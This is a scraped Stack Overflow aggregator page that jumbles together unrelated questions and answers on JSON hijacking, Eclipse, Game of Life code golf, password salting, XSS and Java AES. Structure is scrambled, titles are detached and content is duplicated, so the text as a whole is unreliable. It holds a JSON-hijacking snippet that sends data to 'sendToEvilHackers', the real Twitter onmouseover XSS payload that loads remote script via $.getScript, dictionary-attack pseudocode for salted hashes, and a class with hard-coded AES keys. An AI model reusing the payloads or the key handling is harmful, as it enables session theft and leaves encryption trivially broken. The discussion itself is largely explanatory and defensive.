This is because a few years ago Jeremiah Grossman found a very [interesting vulnerability that affects gmail][1].  Some people have addressed this vulnerabilty by using an [unparseable cruft][2] (Mr bobince&#39;s technical description on this page is fantastic.)

The reason why Microsoft is talking about this is because they haven&#39;t patched their browser (yet). (**Edit:** Recent versions of Edge and IE 10/11 have addressed this issue.)  Mozilla considers this to be a vulnerability in the json specification and therefore they patched it in [Firefox 3][3].  For the record I completely agree with Mozilla, and its unfortunate but each web app developer is going to have to defend them selves against this very obscure vulnerability. 


  [1]: http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html
  [2]: https://stackoverflow.com/questions/3146798/why-do-people-put-code-like-throw-1-dont-be-evil-and-for-in-front-of
  [3]: http://ejohn.org/blog/re-securing-json/

I think it&#39;s because the Array() constructor can be redefined. However, that problem isn&#39;t really unique to arrays.

I think the attack (or one possible way) is something like this:

    function Array(n) {
      var self = this;
      setTimeout(function() {
        sendToEvilHackers(self);
      }, 10);
      return this;
    }

The browser (or some browsers) use that constructor for `[n, n, n]` array notation. A CSRF attack can therefore exploit your open session with your bank, hit a known JSON URL with a `&lt;script&gt;` tag to fetch it, and then *poof* you are owned.

I&#39;m having trouble with a brand new project in a brand new installation of Eclipse. Repro steps:

0. Download this version of Eclipse: http://www.eclipse.org/downloads/packages/eclipse-ide-java-developers/heliosr

1. Unzip to **c:\program files\eclipse java**

2. Launch Eclipse; choose a workspace

3. **File** &gt; **New** &gt; **Java Project** 

4. Project name: **Hello World**. JRE: &quot;Use an execution environment JRE: JavaSE-1.7&quot;

5. Hit **Next**, go to the Libraries tab. The only entry is **JRE System Library [JavaSE-1.7] (unbound)**. What does &quot;unbound&quot; mean? How do I fix it?

6. Hit **Finish**.

Expected: Brand new project works fine.

Actual: There are two errors:

    The project cannot be built until build path errors are resolved HelloWord  Unknown Java Problem
    Unbound classpath container: &#39;JRE System Library [JavaSE-1.7]&#39; in project &#39;HelloWord&#39; HelloWord  Build path Build Path Problem


What am I doing wrong here?

**Update:** Perhaps I don&#39;t actually have the Java 7 JDK on my machine. How can I be sure?

**Update 2:** Looks like Java 7 is in fact not out yet. Sweet. 

Eclipse: Frustration with Java 1.7 (unbound library)

**The Challenge:** Write the shortest program that implements John H. Conway&#39;s *Game of Life* cellular automaton. [[link][1]]

**EDIT:** After about a week of competition, I have selected a victor: **pdehaan**, for managing to beat the Matlab solution by *one* character with perl.

For those who haven&#39;t heard of Game of Life, you take a grid (ideally infinite) of square cells. Cells can be alive (filled) or dead (empty). We determine which cells are alive in the next step of time by applying the following rules:

   1. Any live cell with fewer than two live neighbours dies, as if caused by under-population.
   2. Any live cell with more than three live neighbours dies, as if by overcrowding.
   3. Any live cell with two or three live neighbours lives on to the next generation.
   4. Any dead cell with exactly three live neighbours becomes a live cell, as if by reproduction.


Your program will read in a 40x80 character ASCII text file specified as a command-line argument, as well as the number of iterations (N) to perform. Finally, it will output to an ASCII file out.txt the state of the system after N iterations.

Here is an example run with relevant files:

**in.txt:**

    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ..................................XX............................................
    ..................................X.............................................
    .......................................X........................................
    ................................XXXXXX.X........................................
    ................................X...............................................
    .................................XX.XX...XX.....................................
    ..................................X.X....X.X....................................
    ..................................X.X......X....................................
    ...................................X.......XX...................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................

Iterate 100 times:

    Q:\&gt;life in.txt 100

**Resultant Output (out.txt)**

    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ..................................XX............................................
    ..................................X.X...........................................
    ....................................X...........................................
    ................................XXXXX.XX........................................
    ................................X.....X.........................................
    .................................XX.XX...XX.....................................
    ..................................X.X....X.X....................................
    ..................................X.X......X....................................
    ...................................X.......XX...................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................
    ................................................................................

**The Rules:**

 - You need to use file I/O to read/write the files.
 - You need to accept an input file and the number of iterations as arguments
 - You need to generate out.txt (overwrite if it exists) in the specified format
 - You **don&#39;t** need to deal with the edges of the board (wraparound, infinite grids .etc)
 - EDIT: You **do** need to have newlines in your output file.

The winner will be determined by character count.

Good luck!


  [1]: http://en.wikipedia.org/wiki/Conway%27s_Game_of_Life

Code Golf: Conway&#39;s Game of Life

In the video below, at time marker 21:40, the Microsoft PDC presenter says it&#39;s important that all JSON be wrapped so it&#39;s not a top level array:

https://channel9.msdn.com/Events/PDC/PDC09/FT12

What is the risk of an unwrapped top level array?

How should I check and see if I&#39;m vulnerable?  I purchase many components from 3rd parties and have external vendors who develop my code.  

What are &quot;top level JSON arrays&quot; and why are they a security risk?

In the video below, at time marker 21:40, the Microsoft PDC presenter says it's important that all JSON be wrapped so it's not a top level array:
<a href="https://channel9.msdn.com/Events/PDC/PDC09/FT12" target="_blank" rel="noopener noreferrer">https://channel9.msdn.com/Events/PDC/PDC09/FT12</a>
What is the risk of an unwrapped top level array?
How should I check and see if I'm vulnerable? I purchase many components from 3rd parties and have external vendors who develop my code.

I have some code that tries to parse a date string. 

When I do `alert(Date(&quot;2010-08-17 12:09:36&quot;));`
It properly parses the date and everything works fine but I can&#39;t call the methods associated with `Date`, like `getMonth()`.

When I try:

    var temp = new Date(&quot;2010-08-17 12:09:36&quot;);
    alert(temp);

I get an &quot;invalid date&quot; error.

Any ideas on how to parse &quot;2010-08-17 12:09:36&quot; with new Date()?



Difference between Date(dateString) and new Date(dateString)

Here are two pages, test.php and testserver.php.

**test.php**

    &lt;script src=&quot;scripts/jq.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;
    &lt;script&gt;
        $(function() {
            $.ajax({url:&quot;testserver.php&quot;,
                success:function() {
                    alert(&quot;Success&quot;);
                },
                error:function() {
                    alert(&quot;Error&quot;);
                },
                dataType:&quot;json&quot;,
                type:&quot;get&quot;
            }
        )})
    &lt;/script&gt;

**testserver.php**

    &lt;?php
    $arr = array(&quot;element1&quot;,
                 &quot;element2&quot;,
                 array(&quot;element31&quot;,&quot;element32&quot;));
    $arr[&#39;name&#39;] = &quot;response&quot;;
    echo json_encode($arr);
    ?&gt;

Now my problem: when both of these files are on the same server (either localhost or web server), it works and `alert(&quot;Success&quot;)` is called; If it is on different servers, meaning testserver.php on web server and test.php on localhost, its not working, and `alert(&quot;Error&quot;)` is executing. Even if the URL inside ajax is changed to http://domain.com/path/to/file/testserver.php


jQuery AJAX cross domain

I&#39;d like to be able to find the type of something on the page using JavaScript. 
The problem is as follows: 
I need to check whether a specific area is a checkbox/radio button/ or text field.

If it&#39;s a checkbox or radio button it doesn&#39;t have a length (no strings in it), otherwise if it&#39;s a textfield I need to check whether or not it contains characters. The page is created dynamically so sometimes a checkbox may be displayed, other times a text field.

So my thinking is to find the type of the input, then determine what to do.

Any suggestions would be appreciated.

Finding the &#39;type&#39; of an input element

Is there a way to detect whether or not a user is using a mobile device in jQuery? Something similar to the CSS `@media` attribute? I would like to run a different script if the browser is on a handheld device.

The jQuery `$.browser` function is not what I am looking for.

What is the best way to detect a mobile device?

&gt; **Possible Duplicate:**  
&gt; https://stackoverflow.com/questions/2614862/how-can-i-beautify-json-programmatically  

&lt;!-- End of automatically inserted text --&gt;

I know how to generate JSON from an object using JSON.stringify, or in my case the handy jquery-json from google code (https://github.com/krinkle/jquery-json).  

Now this works fine, but the output is hard to read for humans.  Is there an easy way / function / whatever to output a neatly formatted json file?

This is what I mean:

    JSON.stringify({a:1,b:2,c:{d:1,e:[1,2]}}); 

gives..

    &quot;{&quot;a&quot;:1,&quot;b&quot;:2,&quot;c&quot;:{&quot;d&quot;:1,&quot;e&quot;:[1,2]}}&quot;

I&#39;d like something like this instead:

    {
     &quot;a&quot;:1,
     &quot;b&quot;:2,
     &quot;c&quot;:{
        &quot;d&quot;:1,
        &quot;e&quot;:[1,2]
     }
    }

E.g. with newlines and tabs added. It&#39;s much easier to read for larger documents.

I&#39;d like to do this ideally without adding any huge libraries - e.g. not prototype or YUI or whatever.  

Javascript: How to generate formatted easy-to-read JSON straight from an object?

I need a C++ JSON parser &amp; writer. Speed and reliability are very critical, I don&#39;t care if the interface is nice or not, if it&#39;s Boost-based or not, even a C parser is fine (if it&#39;s considerably faster than C++ ones).

If somebody has experience with the speed of available JSON parsers, please advise.

Fastest JSON reader/writer for C++

A Google APIs encoded in JSON returned an object such as this

    [updated] =&gt; stdClass Object
    (
     [$t] =&gt; 2010-08-18T19:17:42.026Z
    )

Anyone knows how can I access the `$t` value?

`$object-&gt;$t` obviously returns

&gt; Notice: Undefined variable: `t` in /usr/local/...
&gt;
&gt; Fatal error: Cannot access empty property in /....



How can I access an object property named as a variable in php?

I thought this was a n00b thing to do. And, so, I&#39;ve never done it. Then I saw that FriendFeed did this and actually made their DB scale better and decreased latency. I&#39;m curious if I should do this. And, if so, what&#39;s the right way to do it?

Basically, what&#39;s a good place to learn how to store everything in MySQL as a CouchDB sort of DB? Storing everything as JSON seems like it&#39;d be easier and quicker (not to build, less latency).

Also, is it easy to edit, delete, etc., things stored as JSON on the DB?

Storing Data in MySQL as JSON

**Update: Please note I am not asking what a salt is, what a rainbow table is, what a dictionary attack is, or what the purpose of a salt is. I am querying: If you know the users salt and hash, isn&#39;t it quite easy to calculate their password?**

I understand the process, and implement it myself in some of my projects.

    s =  random salt
    storedPassword = sha1(password + s)

In the database you store:

    username | hashed_password | salt

Every implementation of salting I have seen adds the salt either at the end of the password, or beginning:

    hashed_Password = sha1(s + password )
    hashed_Password = sha1(password + s)

Therfore, a dictionary attack from a hacker who is worth his salt (ha ha) would simply run each keyword against the stored salts in the common combinations listed above.

Surely the implementation described above simply adds another step for the hacker, without actually solving the underlying issue?  What alternatives are there to step around this issue, or am I misunderstanding the problem?

The only thing I can think to do is have a secret blending algorithm that laces the salt and password together in a random pattern, or adds other user fields to the hashing process meaning the hacker would have to have access to the database AND code to lace them for a dictionary attack to prove fruitful. (Update, as pointed out in comments it&#39;s best to assume the hacker has access to all your information so this probably isn&#39;t best).

Let me give an example of how I propose a hacker would hack a user database with a list of passwords and hashes:

Data from our hacked database:

    RawPassword (not stored)  |  Hashed   |     Salt
    --------------------------------------------------------
    letmein                       WEFLS...       WEFOJFOFO...

Common password dictionary:

       Common Password
       --------------
       letmein
       12345
       ...

For each user record, loop the common passwords and hash them:

    for each user in hacked_DB
        
        salt = users_salt
        hashed_pw = users_hashed_password
        
        for each common_password
            
            testhash = sha1(common_password + salt)
            if testhash = hashed_pw then
               //Match!  Users password = common_password
               //Lets visit the webpage and login now.
            end if
        
        next
    
    next

I hope this illustrates my point a lot better.

Given 10,000 common passwords, and 10,000 user records, we would need to calculate 100,000,000 hashes to discover as many user passwords as possible.  It might take a few hours, but it&#39;s not really an issue.

**Update on Cracking Theory**

We will assume we are a corrupt webhost, that has access to a database of SHA1 hashes and salts, along with your algorithm to blend them.  The database has 10,000 user records.

[This site][2] claims to be able to calculate 2,300,000,000 SHA1 hashes per second using the GPU.  (In real world situation probably will be slower, but for now we will use that quoted figure).

&gt; (((95^4)/2300000000)/2)*10000 = 177
&gt; seconds

Given a full range of 95 printable ASCII characters, with a maximum length of 4 characters, divided by the rate of calculation (variable), divided by 2 (assuming the average time to discover password will on average require 50% of permutations) for 10,000 users it would take 177 seconds to work out all users passwords where the length is &lt;= 4.

Let&#39;s adjust it a bit for realism.

&gt; (((36^7)/1000000000)/2)*10000 = 2 days

Assuming non case sensitivity, with a password length &lt;= 7, only alphanumeric chars, it would take 4 days to solve for 10,000 user records, and I&#39;ve halved the speed of the algorithm to reflect overhead and non ideal circumstance.

It is important to recognise that this is a linear brute force attack, all calculations are independant of one another, therfore it&#39;s a perfect task for multiple systems to solve.  (IE easy to set up 2 computers running attack from different ends that would half the exectution time).

Given the case of recursively hashing a password 1,000 times to make this task more computationally expensive:

&gt; (((36^7) / 1 000 000 000) / 2) * 1000
&gt; seconds = 10.8839117 hours

This represents a maximum length of 7 alpha-numeric characters, at a less than half speed execution from quoted figure for *one user*.

Recursively hashing 1,000 times effectively blocks a blanket attack, but targetted attacks on user data are still vulnerable.

  [1]: http://saviourc.wordpress.com/2009/09/26/sha1-speed-differences-php-vs-mysql-part-2/
  [2]: http://www.golubev.com/hashgpu.htm

Why do salts make dictionary attacks &#39;impossible&#39;?

I&#39;m essentially preparing phrases to be put into the database, they may be malformed so I want to store a short hash of them instead (I will be simply comparing if they exist or not, so hash is ideal).

I assume MD5 is fairly slow on 100,000+ requests so I wanted to know what would be the best method to hash the phrases, maybe rolling out my own hash function or using `hash(&#39;md4&#39;, &#39;...&#39;` would be faster in the end?

I know MySQL has MD5(), so that would complement a bit of speed on the query end, but maybe there&#39;s further a faster hashing function in MySQL I don&#39;t know about that would work with PHP..

Fastest hash for non-cryptographic uses?

According to wikipedia: http://en.wikipedia.org/wiki/Transport_Layer_Security

Seems like TLS is a replacement to SSL, but most websites are still using SSL?

Difference between SSL &amp; TLS

My understanding of a message digest is that it&#39;s an encrypted hash of some data sent along with the encrypted data so you may verify that the data has not been tampered with. What is the difference then between this and message authentication codes (MAC) and hash MACs (HMAC)?

What&#39;s the difference between Message Digest, Message Authentication Code, and HMAC?

The jar (bcprov-jdk16-145.jar) has been added to the project, `Security.addProvider(new org.bouncycastle.jce.provider.BouncyCastleProvider())` has been added to the class, and `BouncyCastleProvider.PROVIDER_NAME` does return &quot;BC&quot; but AesFileIo.writeFile() still throws `java.security.NoSuchProviderException No such provider: BC`. Any ideas?

    import java.io.FileOutputStream;
    import java.io.InputStreamReader;
    import java.io.ObjectOutputStream;
    import javax.crypto.Cipher;
    import javax.crypto.spec.IvParameterSpec;
    import javax.crypto.spec.SecretKeySpec;
    import org.bouncycastle.jce.provider.BouncyCastleProvider;
    
    public class AesFileIo {
    
        private static final String AES_ALGORITHM = &quot;AES/CTR/NoPadding&quot;;
        private static final String PROVIDER = BouncyCastleProvider.PROVIDER_NAME;
        private static final byte[] AES_KEY_128 = { // Hard coded for now
            78, -90, 42, 70, -5, 20, -114, 103,
            -99, -25, 76, 95, -85, 94, 57, 54};
        private static final byte[] IV = { // Hard coded for now
            -85, -67, -5, 88, 28, 49, 49, 85,
            114, 83, -40, 119, -65, 91, 76, 108};
        private static final SecretKeySpec secretKeySpec =
                new SecretKeySpec(AES_KEY_128, &quot;AES&quot;);
        private static final IvParameterSpec ivSpec = new IvParameterSpec(IV);
    
        public void AesFileIo() {
            Security.addProvider(new org.bouncycastle.jce.provider
                    .BouncyCastleProvider());
        }
        
        public void writeFile(String fileName, String theFile) {
            try {
                Cipher cipher = Cipher.getInstance(AES_ALGORITHM, PROVIDER);
                cipher.init(Cipher.ENCRYPT_MODE, secretKeySpec, ivSpec);
                byte[] encrypted = cipher.doFinal(theFile.getBytes());
                ObjectOutputStream os = new ObjectOutputStream(
                    new FileOutputStream(fileName));
                os.write(encrypted);
                os.flush();
                os.close();
            } catch (Exception e) {
                StackTraceElement se = new Exception().getStackTrace()[0];
                System.err.println(se.getFileName() + &quot; &quot; + se.getLineNumber()
                        + &quot; &quot; + e);
            }
        }
    }



Why java.security.NoSuchProviderException No such provider: BC?

Is it possible to use cross site scripting in a CSS stylesheet? For example a reference stylesheet contains malicious code, how would you do this?
I know you can use style tags but what about stylesheets?

Cross Site Scripting in CSS Stylesheets

Any idea how one would go about preventing XSS attacks on a node.js app? Any libs out there that handle removing javascript in hrefs, onclick attributes,etc. from POSTed data?

I don&#39;t want to have to write a regex for all that :)

Any suggestions?

Preventing XSS in Node.js / server side javascript

Can you explain what exactly happened on Twitter today? Basically the exploit was causing people to post a tweet containing this link:  

&lt;pre&gt;http://t.co/@&quot;style=&quot;font-size:999999999999px;&quot;onmouseover=&quot;$.getScript(&#39;http:\u002f\u002fis.gd\u002ffl9A7&#39;)&quot;/&lt;/pre&gt;

Is this technically an XSS attack or something else?

Here is how the Twitter home page looked like: http://www.flickr.com/photos/travelist/6832853140/


Today&#39;s XSS onmouseover exploit on twitter.com

I have a lot of user inputs from `$_GET` and `$_POST`... At the moment I always write `mysql_real_escape_string($_GET[&#39;var&#39;])`..

I would like to know whether you could make a function that secures, escapes and cleans the `$_GET`/`$_POST` arrays right away, so you won&#39;t have to deal with it each time you are working with user inputs and such.

I was thinking of an function, e.g `cleanMe($input)`, and inside it, it should do `mysql_real_escape_string`, `htmlspecialchars`, `strip_tags`, `stripslashes` (I think that would be all to make it clean &amp; secure) and then return the `$input`.

So is this possible? Making a function that works for all `$_GET` and `$_POST`, so you would do only this:

    $_GET  = cleanMe($_GET);
    $_POST = cleanMe($_POST);

So in your code later, when you work with e.g `$_GET[&#39;blabla&#39;]` or `$_POST[&#39;haha&#39;]` , they are secured, stripped and so on?

Tried myself a little:

    function cleanMe($input) {
       $input = mysql_real_escape_string($input);
       $input = htmlspecialchars($input, ENT_IGNORE, &#39;utf-8&#39;);
       $input = strip_tags($input);
       $input = stripslashes($input);
       return $input;
    }




The ultimate clean/secure function

I read the tutorial [DIY widgets - How to embed your site on another site](https://web.archive.org/web/20080720015427/http://drnicwilliams.com/2006/11/21/diy-widgets/) for XSS Widgets by Dr. Nic.  

I&#39;m looking for a way to pass parameters to the script tag. For example, to make the following work:


    &lt;script src=&quot;http://path/to/widget.js?param_a=1&amp;amp;param_b=3&quot;&gt;&lt;/script&gt;

Is there a way to do this?

___

Two interesting links:

  * https://stackoverflow.com/questions/2170439/how-to-embed-javascript-widget-that-depends-on-jquery-into-an-unknown-environment (Stackoverflow discussion)
  * [An article on passing parameters to a script tag](http://feather.elektrum.org/book/src.html)

Content Type	Original Author	Original Content on Stackoverflow
Question	makerofthings7	View Question on Stackoverflow
Solution 1 - Javascript	rook	View Answer on Stackoverflow
Solution 2 - Javascript	Pointy	View Answer on Stackoverflow

What are "top level JSON arrays" and why are they a security risk?

Javascript Problem Overview

Javascript Solutions

Solution 1 - Javascript

Solution 2 - Javascript

Code Golf: Conway's Game of Life

Eclipse: Frustration with Java 1.7 (unbound library)

Attributions